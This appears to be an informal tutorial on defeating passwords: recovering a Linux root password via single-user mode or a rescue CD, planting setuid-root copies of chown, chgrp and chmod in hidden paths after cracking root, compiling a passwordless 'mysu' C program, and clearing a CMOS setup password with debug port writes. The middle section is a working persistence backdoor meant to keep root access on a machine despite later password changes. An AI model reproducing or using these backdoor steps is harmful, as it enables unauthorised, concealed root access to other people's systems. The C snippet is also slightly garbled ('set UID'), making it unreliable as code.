What if you forgot the any password and can't fully utilize your own system? Here I'm giving some ways to get out of this trouble. There are many type of password protection systems and not all of them can be broken or cracked but I can help you for those systems that I have broken or know how to break.
It was a PC at my college and we didn't know the root password then I tried something that worked fine so I am telling it to you so that someone who might want the solution of the same situation can do it.
What I did at college was a long procedure but now I know a better way. First come to the linux's lilo boot prompt. If you have a graphical lilo prompt then press CTRL-X to get this prompt and enter the fallowing:
boot: linux 1
Now you will enter a single user mode where you wont be asked about any password but still you will have root privilege so open /etc/passwd and remove the encrypted password from there. You will get a line like fallowing in the /etc/passwd
root:x:0:0:root:/root:/bin/bash
The x written in the file between root: and :0 is the password field. Actually there should be a long encrypted string of the password but for security purposes on some systems it is replaced by something else (like x here) and original strings are kept in the file /etc/shadow. So if you have that encrypted string there then you have to delete the whole string. Your line should look somewhat like:-
root::0:0:root:/root:/bin/bash
You can also delete the encrypted string from /etc/shadow instead of /etc/passwd and that is even better. Now save the file and quit the editor and then logout by pressing CTRL-D this will not only log you out but also reboot the system as well. Now boot the Linux as usual. On the login prompt enter root as login name and don't type anything as password just hit enter and voila! You are logged in successfully. Now you can give a new password using passwd command.
If this worked then no need to read further but if this is not possible due to some problem (like related to lilo) then here is another way.
This way is not only for for recovering password but you can use it in many LILO or GRUB related problems. So first I used a bootable linux CD to boot the system. I used the cd just to get boot prompt. Once you get a boot prompt enter this:-
boot: linux rescue
After conforming some defaults It will give you a shell prompt to work further. Then make a directory to mount the / (root) file system of your linux partition and then mount the root partition on it.
mkdir /tmpmount # Note:1)This is being made in the RAM # because we are working in a virtual # file system called RAMdisk. mount /dev/hda4 /tmpmount # Note:2)In my case hda4 had the / # (root) file system. cd /tmpmount/etc vi passwdNOTE: Some new versions do this work for you so checkout your CD's documentation.
At this moment I understood the importance of VI. Otherwise I was a critic of it. Actually it is a fact that this is the only editor, which is available even in such circumstances.
Now use the cursor movement keys j (for down), k (for up), h (for right) and l (for left) to locate the line:-
root:x:0:0:root:/root:/bin/bash
Now locate your cursor under the x after root: and press x to delete it. I want to clear two things here. First that when you enter in VI, by default you are in command mode so whatever key you press will be taken as a command and not inserted in the file. Here x is the command to delete the current letter.
The second thing is the x written in the file between root: and :0. Actually there should be a long encrypted string of the password but for security purposes on some systems it is replaced by something else (like x here) and original strings are kept in some other file. So if you have that encrypted string there then you have to delete the whole string using the x command repetitively. Your line should look somewhat like:-
root::0:0:root:/root:/bin/bash
Now enter :wq to save the file and exit the editor. Now unmount the file system and logout by giving these commands:-
:wq
cd /
umount tmpmount
[Ctrl-D] # Note: press D while Control key is down.
This will not only log you out but also reboot the system as well. Now remove the CD from the drive and boot the Linux as usual. On the login prompt enter root as login name and don't type anything as password just hit enter and voila! You are logged in successfully. Now you can give a new password using passwd command.
What to do, if you get the UNIX root password for one time use? Or in other words, if you somehow got the root password with some cracking techniques like brute force then, what to do next? In a few seconds you can make an arrangement so that you may access the root account without any password. It means that future password changes will not affect your access to the root. What to do in those few seconds is as follows:
[root@xyz /]# cp /bin/ch* /usr/lib/ # /usr/lib/ is just an example. [root@xyz /]# chmod 7777 /usr/lib/ch* # You Should use more cryptic paths
Isn't it a matter of a few seconds? But before going further, let me explain you the meaning of the above two lines. The first line is doing nothing but copying three files to some arbitrary (wherever you think it is safe) location. These three files are:
I used ch* because in the /bin directory only these three files has a ch prefix. After copying these three files to some cryptic location I used chmod command to grant all accesses and set UID to root. I could use more sophisticated access mask to make them set UID to root but I used just 4 sevens because it is easy to remember. One more thing, here too, I have used ch* because I was sure that in the /usr/lib/ directory only the files I had just copied were having the ch prefix. You should use your own way to pass them to chmod command. In short the whole purpose of these two commands is to get a copy of these three files with set UID to root.
After running the above two commands you can safely exit the root shell. You no longer need a root access now because as long as the three files remain there intact, you can get access to the root from any account (even guest) on that computer. How? That is what we will discus now. First of all realize the power you are having. Now since you have these commands with set UID to root, you can change the owner/group of any file to root/root, even being an ordinary user. Then, you can change the mode of that file to set UID and thus you can run any program with set UID root. In old days people often make the shell itself a set UID program so that they can easily run every command as root but these days, due to a new security feature, it will not work because now only having set UID in file access is not sufficient. The program also needs to call a set UID system call to activate the access. Later programs can also deactivate it. This feature limits the power of set UID to only a small piece of code and thus make it free from any unwanted security bugs. To cope with this feature we have to write a 'C' program so that we can work in a root shell.
This is a program which works much like the su command but the only difference is that it doesn't ask you for password. So here is the coding.
01 main(int argc, char *argv[]){ 02 if(-1 == set UID((argc>1) ? atoi(argv[1]) : 0)) perror("su"); 03 execlp("su", "su", (char *)0); 04 }
It is just a matter of 4 lines of code. Now compile it and prepare it for running with these commands.
[ashu@xyz ashu]# gcc mysu.c -o mysu # Compile the code to get "mysu". [ashu@xyz ashu]# /usr/lib/chown root mysu # Change the Owner. [ashu@xyz ashu]# /usr/lib/chgrp root mysu # Change the Group. [ashu@xyz ashu]# /usr/lib/chmod 7777 mysu # Change the Mode to "set UID". [ashu@xyz ashu]# ./mysu # Run mysu. [root@xyz ashu]# # Voila !!! You are root now.
I think there is no need to explain any further. I have tested it on a Linux box many times and it works but once when I got an Irix machine I tried it and it didn't work. I didn't got much time on that machine so I couldn't experiment with it. If somebody has an Irix machine please do some research and tell me if you get success. If you have some other UNIXes then tell me if this works on those UNIX flavors too.
For breaking the BIOS's system password you have to take out the battery or any jumper (consult the manufacture's manual) for some time but if this is just a CMOS Setup password then you don't need any hardware work as you can at least boot your system. So this is for those who have to break the CMOS Setup password.
For this you need DOS or Windows98 (Not NT/2000/XP) so if you don't have any of these installed then use a boot floppy or windows98 bootable CD to boot into one of these. Now at the dos prompt enter fallowing:-
C:\>debug -o 70 12 -o 71 12 -q C:\>
You have done!!! Now reboot and enter the CMOS Setup by pressing DEL key or whatever. It will not ask for any password. Now check all your settings as it also resets some settings to defaults so change them and/or the password if you want. I have successfully tested it on many Award and Phoenix BIOSs on PCs but not on any others like Mac. Once again DO THIS AT YOUR OWN RISK.
|
|
|